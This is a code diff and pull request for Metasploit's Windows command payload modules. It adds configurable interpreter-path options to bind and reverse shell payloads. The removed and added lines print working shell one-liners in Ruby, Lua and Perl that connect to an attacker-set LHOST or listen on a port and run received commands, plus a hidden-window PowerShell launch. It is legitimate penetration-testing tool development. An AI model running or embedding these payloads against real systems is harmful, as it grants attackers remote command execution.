-      'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
-      'Author'      => 'kris katterjohn',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'win',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::BindTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ruby',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Windows Command Shell, Bind TCP (via Ruby)',
+     'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
+     'Author'      => 'kris katterjohn',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'win',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::BindTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ruby',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
+    register_advanced_options(
+      [
+        OptString.new('RubyPath', [true, 'The path to the Ruby executable', 'ruby'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -32,6 +37,6 @@ module MetasploitModule
   end
 
   def command_string
-    "ruby -rsocket -e \"s=TCPServer.new(\\\"#{datastore['LPORT']}\\\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end;end\""
+    "#{datastore['RubyPath']} -rsocket -e \"s=TCPServer.new(\\\"#{datastore['LPORT']}\\\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end;end\""
   end
 end

--- a/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb
+++ b/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb
@@ -34,13 +34,13 @@ module MetasploitModule
         'Payload' => { 'Offsets' => {}, 'Payload' => '' }
       )
     )
-    register_options [
+    register_options([
       OptString.new('SHELL', [ true, 'The shell to execute.', 'cmd.exe' ]),
-      OptString.new('JJS_PATH', [ true, 'The path to JJS.', 'jjs.exe' ])
-    ]
+      OptString.new('JJS_PATH', [true, 'The path to the JJS executable', 'jjs.exe'])
+    ])
   end
 
-  def generate(_opts = {})
+  def generate
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/windows/reverse_lua.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_lua.rb
@@ -13,25 +13,30 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Command Shell, Reverse TCP (via Lua)',
-      'Description'   => 'Creates an interactive shell via Lua',
-      'Author'        =>
-      [
-        'xistence <xistence[at]0x90.nl>',
-      ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'lua',
-      'Payload'       =>
-      {
-        'Offsets' => { },
-        'Payload' => ''
-      }
+     'Name'          => 'Windows Command Shell, Reverse TCP (via Lua)',
+     'Description'   => 'Creates an interactive shell via Lua',
+     'Author'        =>
+       [
+         'xistence <xistence[at]0x90.nl>',
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'win',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'lua',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
     ))
+    register_advanced_options(
+      [
+        OptString.new('LuaPath', [true, 'The path to the Lua executable', 'lua'])
+      ]
+    )
   end
 
   #
@@ -45,7 +50,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "lua -e \"local s=require('socket');local t=assert(s.tcp());t:connect('#{datastore['LHOST']}',#{datastore['LPORT']});while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();\""
+    "#{datastore['LuaPath']} -e \"local s=require('socket');local t=assert(s.tcp());t:connect('#{datastore['LHOST']}',#{datastore['LPORT']});while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();\""
   end
 end
 

--- a/modules/payloads/singles/cmd/windows/reverse_perl.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb
@@ -13,22 +13,27 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Command, Double Reverse TCP Connection (via Perl)',
-      'Description'   => 'Creates an interactive shell via perl',
-      'Author'        => ['cazz', 'aushack'],
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'perl',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Windows Command, Double Reverse TCP Connection (via Perl)',
+     'Description'   => 'Creates an interactive shell via perl',
+     'Author'        => ['cazz', 'aushack'],
+     'License'       => BSD_LICENSE,
+     'Platform'      => 'win',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'perl',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])
+      ]
+    )
   end
 
   #
@@ -45,6 +50,6 @@ module MetasploitModule
     lhost = datastore['LHOST']
     ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-    cmd   = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}
+    cmd   = %{#{datastore['PerlPath']} -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}
   end
 end

--- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb
@@ -13,31 +13,36 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Command Shell, Reverse TCP (via Powershell)',
-      'Description'   => 'Connect back and create a command shell via Powershell',
-      'Author'        =>
-        [
-          'Dave Kennedy', # Original payload from trustedsec on SET
-          'Ben Campbell' # Metasploit module
-        ],
-      'References'    =>
-        [
-          ['URL', 'https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell']
-        ],
-      # The powershell code is from SET, copyrighted by TrustedSEC, LLC and BSD licensed -- see https://github.com/trustedsec/social-engineer-toolkit/blob/master/readme/LICENSE
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'powershell',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Windows Command Shell, Reverse TCP (via Powershell)',
+     'Description'   => 'Connect back and create a command shell via Powershell',
+     'Author'        =>
+       [
+         'Dave Kennedy', # Original payload from trustedsec on SET
+         'Ben Campbell' # Metasploit module
+       ],
+     'References'    =>
+       [
+         ['URL', 'https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell']
+       ],
+     # The powershell code is from SET, copyrighted by TrustedSEC, LLC and BSD licensed -- see https://github.com/trustedsec/social-engineer-toolkit/blob/master/readme/LICENSE
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'win',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'powershell',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PowerShellPath', [true, 'The path to the PowerShell executable', 'powershell'])
+      ]
+    )
   end
 
   #
@@ -107,6 +112,6 @@ while ($true) {
 }
 ^.gsub!("\n", "")
 
-    "powershell -w hidden -nop -c #{powershell}"
+    "#{datastore['PowerShellPath']} -w hidden -nop -c #{powershell}"
   end
 end

--- a/modules/payloads/singles/cmd/windows/reverse_ruby.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_ruby.rb
@@ -13,18 +13,23 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Windows Command Shell, Reverse TCP (via Ruby)',
-      'Description' => 'Connect back and create a command shell via Ruby',
-      'Author'      => 'kris katterjohn',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'win',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ruby',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Windows Command Shell, Reverse TCP (via Ruby)',
+     'Description' => 'Connect back and create a command shell via Ruby',
+     'Author'      => 'kris katterjohn',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'win',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ruby',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
+    register_advanced_options(
+      [
+        OptString.new('RubyPath', [true, 'The path to the Ruby executable', 'ruby'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -32,6 +37,6 @@ module MetasploitModule
   end
 
   def command_string
-    "ruby -rsocket -e \"c=TCPSocket.new(\\\"#{datastore['LHOST']}\\\",\\\"#{datastore['LPORT']}\\\");while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end\""
+    "#{datastore['RubyPath']} -rsocket -e \"c=TCPSocket.new(\\\"#{datastore['LHOST']}\\\",\\\"#{datastore['LPORT']}\\\");while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end\""
   end
 end


### PR DESCRIPTION
Fixes #17204 and makes changes as per PR #17232. 

This PR adds a `PATH` executable as a advanced option to the cmd payloads. 

This change has been observed in metasploit v6.2.25-dev-ff508d14af
on Linux kali 5.18 (x86_64) with kernel version 5.18.0-kali5-amd64

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi` or any other `exploit`
- [ ] `set payload <a payload that is modified>`
- [ ] run `show advanced`
- [ ] **Verify** the new path options available

![Screenshot_1](https://user-images.githubusercontent.com/97749978/201469812-e07546bb-de6e-4d08-8c8f-bc051ba5529f.png)
